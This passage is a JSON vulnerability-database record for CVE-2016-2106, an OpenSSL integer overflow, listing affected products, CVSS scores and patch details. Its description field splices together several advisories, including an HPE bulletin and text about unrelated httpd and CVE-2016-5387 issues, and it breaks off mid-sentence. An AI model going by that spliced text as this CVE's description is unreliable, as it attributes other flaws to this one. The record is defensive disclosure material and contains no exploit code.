collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(0.98000.88)" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.1" }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null } ], "sources": [ { "db": "BID", "id": "89744" }, { "db": "CNNVD", "id": "CNNVD-201605-082" }, { "db": "NVD", "id": "CVE-2016-2106" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.1s", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2106" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Guido Vranken", "sources": [ { "db": "BID", "id": "89744" }, { "db": "CNNVD", "id": "CNNVD-201605-082" } ], "trust": 0.9 }, "cve": "CVE-2016-2106", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2016-2106", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2106", "trust": 1.0, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201605-082", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2016-2106", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2106" }, { "db": "CNNVD", "id": "CNNVD-201605-082" }, { "db": "NVD", "id": "CVE-2016-2106" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Integer overflow in the EVP_EncryptUpdate function in crypto/evp/evp_enc.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of data. OpenSSL is prone to an integer-overflow vulnerability. \nAn attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. \nFollowing product versions are affected:\nOpenSSL versions 1.0.2 prior to 1.0.2h are vulnerable. \nOpenSSL versions 1.0.1 prior to 1.0.1t are vulnerable. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. \n\nSecurity Fix(es):\n\n* It was discovered that httpd used the value of the Proxy header from HTTP\nrequests to initialize the HTTP_PROXY environment variable for CGI scripts,\nwhich in turn was incorrectly used by certain HTTP client implementations\nto configure the proxy for outgoing HTTP requests. After installing the updated\npackages, the httpd daemon will be restarted automatically. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03756en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbhf03756en_us\nVersion: 1\n\nHPESBHF03756 rev.1 - HPE Network Products including Comware 7, iMC, and VCX\nrunning OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive\nInformation\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-06-05\nLast Updated: 2017-06-05\n\nPotential Security Impact: Remote: Denial of Service (DoS), Disclosure of\nSensitive Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities with OpenSSL have been addressed for HPE\nnetwork products including Comware 7, iMC, and VCX. The vulnerabilities could\nbe remotely exploited resulting in Denial of Service (DoS) or disclosure of\nsensitive information. \n\nReferences:\n\n - CVE-2016-2105 - Remote Denial of Service (DoS)\n - CVE-2016-2106 - Remote Denial of Service (DoS)\n - CVE-2016-2107 - Remote disclosure of sensitive information\n - CVE-2016-2108 - Remote Denial of Service (DoS)\n - CVE-2016-2109 - Remote Denial of Service (DoS)\n - CVE-2016-2176 - Remote Denial of Service (DoS)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - VCX Products All versions - Please refer to the RESOLUTION below for a\nlist of updated products. \n - Comware v7 (CW7) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n - HP Intelligent Management Center (iMC) All versions - Please refer to the\nRESOLUTION below for a list of updated products. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2016-2105\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2106\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2107\n 3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\n 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\n\n CVE-2016-2108\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n CVE-2016-2109\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)\n\n CVE-2016-2176\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\n 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following software updates available to resolve the\nvulnerabilities in the Comware 7, iMC and VCX products running OpenSSL. \n\n**COMWARE 7 Products**\n\n + 12500 (Comware 7) - Version: R7377P02\n * HP Network Products\n - JC072B HP 12500 Main Processing Unit\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 10500 (Comware 7) - Version: R7184\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG608A HP FlexFabric 11908-V Switch Chassis\n - JG609A HP FlexFabric 11900 Main Processing Unit\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5900/5920 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG296A HP 5920AF-24XG Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG555A HP 5920AF-24XG TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR1000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR2000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR3000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG407A HP MSR3024 DC Router\n - JG408A HP MSR3024 PoE Router\n - JG409A HP MSR3012 AC Router\n - JG410A HP MSR3012 DC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR4000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + VSR (Comware 7) - Version: E0324\n * HP Network Products\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 7900 (Comware 7) - Version: R2152\n * HP Network Products\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5130 (Comware 7) - Version: R3115\n * HP Network Products\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 6125XLG - Version: R2422P02\n * HP Network Products\n - 711307-B21 HP 6125XLG Blade Switch\n - 737230-B21 HP 6125XLG Blade Switch with TAA\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 6127XLG - Version: R2422P02\n * HP Network Products\n - 787635-B21 HP 6127XLG Blade Switch Opt Kit\n - 787635-B22 HP 6127XLG Blade Switch with TAA\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + Moonshot - Version: R2432\n * HP Network Products\n - 786617-B21 - HP Moonshot-45Gc Switch Module\n - 704654-B21 - HP Moonshot-45XGc Switch Module\n - 786619-B21 - HP Moonshot-180XGc Switch Module\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5700 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5930 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 1950 (Comware 7) - Version: R3115\n * HP Network Products\n - JG960A HP 1950-24G-4XG Switch\n - JG961A HP 1950-48G-2SFP+-2XGT Switch\n - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 7500 (Comware 7) - Version: R7184\n * HP Network Products\n - JD238C HP 7510 Switch Chassis\n - JD239C HP 7506 Switch Chassis\n - JD240C HP 7503 Switch Chassis\n - JD242C HP 7502 Switch Chassis\n - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n - JH208A HP 7502 Main Processing Unit\n - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5510HI (Comware 7) - Version: R1120P10\n * HP Network Products\n - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5130HI (Comware 7) - Version: R1120P10\n * HP Network Products\n - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5940 - Version: R2509\n * HP Network Products\n - JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch\n - JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch\n - JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch\n - JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch\n - JH396A HPE FlexFabric 5940 32QSFP+ Switch\n - JH397A HPE FlexFabric 5940 2-slot Switch\n - JH398A HPE FlexFabric 5940 4-slot Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5950 - Version: R6123\n * HP Network Products\n - JH321A HPE FlexFabric 5950 32QSFP28 Switch\n - JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch\n - JH404A HPE FlexFabric 5950 4-slot Switch\n + 12900E (Comware 7) - Version: R2609\n * HP Network Products\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n\n\n**iMC Products**\n\n + iNode PC 7.2 (E0410) - Version: 7.2 E0410\n * HP Network Products\n - JD144A HP A-IMC User Access Management Software Module with 200-user\nLicense\n - JD147A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JD435A HP A-IMC Endpoint Admission Defense Client Software\n - JF388A HP IMC User Authentication Management Software Module with\n200-user License\n - JF388AAE HP IMC User Authentication Management Software Module with\n200-user E-LTU\n - JF391A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JF391AAE HP IMC Endpoint Admission Defense Software Module with\n200-user E-LTU\n - JG752AAE HP IMC User Access Manager Software Module with 50-user\nE-LTU\n - JG754AAE) HP IMC Endpoint Admission Defense Software Module with\n50-user E-LTU\n * CVEs\n - CVE-2016-2106\n - CVE-2016-2109\n - CVE-2016-2176\n + iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409\n * HP Network Products\n - JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE\n - JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU\n - JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU\n - JG483A HP IMC TAM S/W MODULE W/100-NODE LIC\n - JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU\n - JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU\n * CVEs\n - CVE-2016-2106\n - CVE-2016-2109\n - CVE-2016-2176\n\n\n**VCX Products**\n\n + VCX - Version: 9.8.19\n * HP Network Products\n - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n - JC518A HP VCX Connect 200 Primry 120 G6 Server\n - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n - JE341A HP VCX Connect 100 Secondary\n - JE252A HP VCX Connect Primary MIM Module\n - JE253A HP VCX Connect Secondary MIM Module\n - JE254A HP VCX Branch MIM Module\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n - JD023A HP MSR30-40 Router with VCX MIM Module\n - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n - JE340A HP VCX Connect 100 Pri Server 9.0\n - JE342A HP VCX Connect 100 Sec Server 9.0\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 2 June 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n(CVE-2016-5387)\n\n* It was discovered that OpenSSL would accept ephemeral RSA keys when using\nnon-export 